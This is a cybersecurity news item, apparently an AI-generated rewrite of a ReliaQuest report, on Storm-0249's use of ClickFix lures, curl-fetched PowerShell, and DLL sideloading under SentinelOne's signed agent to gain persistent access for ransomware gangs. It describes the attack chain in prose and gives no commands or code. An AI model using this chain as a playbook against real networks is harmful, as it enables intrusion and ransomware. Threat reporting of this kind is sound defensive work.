Ethical Hacking News
A new threat actor known as Storm-0249 has escalated its ransomware attacks by adopting more advanced tactics, including ClickFix social engineering and DLL sideloading. By leveraging the trust associated with signed processes, the threat actor is able to execute malicious commands and establish persistent access to networks, making it essential for cybersecurity teams to stay vigilant and implement effective measures to prevent these attacks.
Storm-0249 has shifted its tactics to adopt more advanced methods for ransomware attacks. The threat actor is using the ClickFix social engineering tactic to trick targets into running malicious commands via the Windows Run dialog. Storm-0249 leverages trusted processes, such as SentinelOne's endpoint security solution, to execute malicious payloads with SYSTEM privileges. The tactic allows Storm-0249 to bypass defenses and operate undetected by sideloading rogue DLLs and communicating with C2 servers. Storm-0249 is using legitimate Windows utilities to extract system identifiers for future ransomware attacks.
In a recent report from ReliaQuest, it has been revealed that the threat actor known as Storm-0249 has been shifting its tactics to adopt more advanced methods in order to facilitate ransomware attacks. The initial access broker, previously highlighted by Microsoft in September 2024, has now resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog.
According to ReliaQuest, Storm-0249 has been utilizing this tactic to leverage the trust associated with signed processes for added stealth. By copying and executing a command that leverages the legitimate "curl.exe" to fetch a PowerShell script from a URL that mimics a Microsoft domain, the threat actor is able to execute a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL associated with SentinelOne's endpoint security solution into the user's AppData folder along with the legitimate "SentinelAgentWorker.exe" executable.
The idea behind this tactic is to sideload the rogue DLL when the "SentinelAgentWorker.exe" process is launched, thereby allowing the activity to stay undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server, demonstrating a departure from mass phishing campaigns to precision attacks that weaponize the trust associated with signed processes for added stealth.
ReliaQuest noted that this tactic allows Storm-0249 to bypass defenses, infiltrate networks, maintain persistence, and operate undetected. The use of living-off-the-land (LotL) tactics, coupled with the fact that these commands are run under the trusted "SentinelAgentWorker.exe" process, means that the activity is unlikely to raise any red flags.
Additionally, Storm-0249 has been observed making use of legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers like MachineGuid to lay the groundwork for follow-on ransomware attacks. This finding demonstrates a tactical shift on the part of the threat actor, as it moves away from traditional phishing campaigns and towards more sophisticated tactics.
The end goal of these infections is to obtain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets, and accelerating the pace of such attacks. As ReliaQuest stated, "This isn't just generic reconnaissance – it's preparation for ransomware affiliates." By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt files without the attacker-controlled key.
The findings from ReliaQuest demonstrate a new era of stealthy malware, as Storm-0249 continues to evolve its tactics in order to evade detection and remain undetected. As cybersecurity teams continue to adapt to these emerging threats, it is essential that they stay vigilant and implement effective measures to prevent such attacks from compromising their networks.
Related Information:
https://www.ethicalhackingnews.com/articles/-Storm-0249-Escalates-Ransomware-Attacks-with-ClickFix-Fileless-PowerShell-and-DLL-Sideloading-A-New-Era-of-Stealthy-Malware--ehn.shtml
https://thehackernews.com/2025/12/storm-0249-escalates-ransomware-attacks.html
https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation/
Published: Tue Dec 9 08:43:27 2025 by llama3.2 3B Q4_K_M
